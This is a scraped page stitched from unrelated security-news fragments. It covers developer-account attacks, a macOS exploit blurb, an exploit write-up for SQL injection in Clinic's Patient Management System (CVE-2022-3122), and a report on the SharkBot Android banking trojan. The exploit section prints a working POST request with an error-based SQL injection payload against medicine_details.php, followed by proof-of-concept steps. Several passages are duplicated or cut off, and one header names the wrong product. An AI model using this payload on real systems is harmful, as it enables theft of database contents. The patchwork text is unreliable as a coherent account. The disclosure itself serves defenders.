Gaining unauthorized access to accounts and injecting malicious code into widely used projects by trusted developers can be a goldmine for threat actors, significantly widening the impact of the campaigns.

"It's highly likely the actors aim to target software developers and IT engineers to gain access to their repositories with the end goal to hack 'downstream' targets," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New EvilProxy Phishing Service Allowing Cybercriminals to Bypass 2-Factor Security

This is a proof of concept exploit for the Apple macOS remote events remote memory corruption vulnerability. It serves as a toolkit to help debug and trigger crashes.

Apple macOS Remote Events Memory Corruption

A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file medicine_details.php. The manipulation of the argument medicine leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-207854 is the identifier assigned to this vulnerability.

**Clinic's Patient Management System - medicine\_details.php 'medicine' SQL inject****Exploit Title: Clinic's Patient Management System - medicine\_details.php 'medicine' SQL inject****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code****Software Link:https://www.sourcecodester.com/php-clinics-patient-management-system-source-code****Version: Loan Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Clinic's Patient Management System does not filter the content correctly at the "medicine\_details.php /medicine" parameter, resulting in the generation of SQL injection.

**Payload used:**

    POST /medicine_details.php HTTP/1.1
    Host: 192.168.31.35:8089
    Content-Length: 79
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.31.35:8089
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.31.35:8089/medicine_details.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lkdn1jvj1em9c4j3olu9e2pdpo
    Connection: close
    
    medicine=1 AND GTID_SUBSET(CONCAT(0,(SELECT user()),0),3619)&packing=11&submit=
    

**Proof of Concept**

1、After logging in, use the add medicine function to capture and analyze the traffic, and find that the program is in medicine\_details.php.

2、Looking at the source code, it is found that the password field is directly brought into the SQL statement query without filtering

3、During manual testing, it is found that SQL error reporting injection exists, so the sensitive information and permissions of the database can be obtained by using the error reporting

4、Through testing with the tool, it is found that there are other injection methods such as blind SQL time injection.

CVE-2022-3122: webray.com.cn/cpmssql.md at main · joinia/webray.com.cn

The notorious Android banking trojan known as SharkBot has once again made an appearance on the Google Play Store by masquerading as antivirus and cleaner apps.
"This new dropper doesn't rely on Accessibility permissions to automatically perform the installation of the dropper Sharkbot malware," NCC Group's Fox-IT said in a report. "Instead, this new version asks the victim to install the

The notorious Android banking trojan known as SharkBot has once again made an appearance on the Google Play Store by masquerading as antivirus and cleaner apps.

"This new dropper doesn't rely on Accessibility permissions to automatically perform the installation of the dropper Sharkbot malware," NCC Group's Fox-IT said in a report. "Instead, this new version asks the victim to install the malware as a fake update for the antivirus to stay protected against threats."

The apps in question, Mister Phone Cleaner and Kylhavy Mobile Security, have over 60,000 installations between them and are designed to target users in Spain, Australia, Poland, Germany, the U.S., and Austria -

*   Mister Phone Cleaner (com.mbkristine8.cleanmaster, 50,000+ downloads)
*   Kylhavy Mobile Security (com.kylhavy.antivirus, 10,000+ downloads)

The droppers are designed to drop a new version of SharkBot, dubbed V2 by Dutch security firm ThreatFabric, which features an updated command-and-control (C2) communication mechanism, a domain generation algorithm (DGA), and a fully refactored codebase.

Fox-IT said it discovered a newer version 2.25 on August 22, 2022, that introduces a function to siphon cookies when victims log in to their bank accounts, while also removing the ability to automatically reply to incoming messages with links to the malware for propagation.

By eschewing the Accessibility permissions for installing SharkBot, the development highlights that the operators are actively tweaking their techniques to avoid detection, not to mention find alternative methods in the face of Google's newly imposed restrictions to curtail the abuse of the APIs.

Other notable information stealing capabilities include injecting fake overlays to harvest bank account credentials, logging keystrokes, intercepting SMS messages, and carrying out fraudulent fund transfers using the Automated Transfer System (ATS).

It's no surprise that malware poses an evolving and omnipresent threat, and despite continued efforts on the part of Apple and Google, app stores are vulnerable to unknowingly being abused for distribution, with the developers of these apps trying every trick in the book to dodge security checks.

"Until now, SharkBot's developers seem to have been focusing on the dropper in order to keep using Google Play Store to distribute their malware in the latest campaigns," researchers Alberto Segura and Mike Stokkel said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple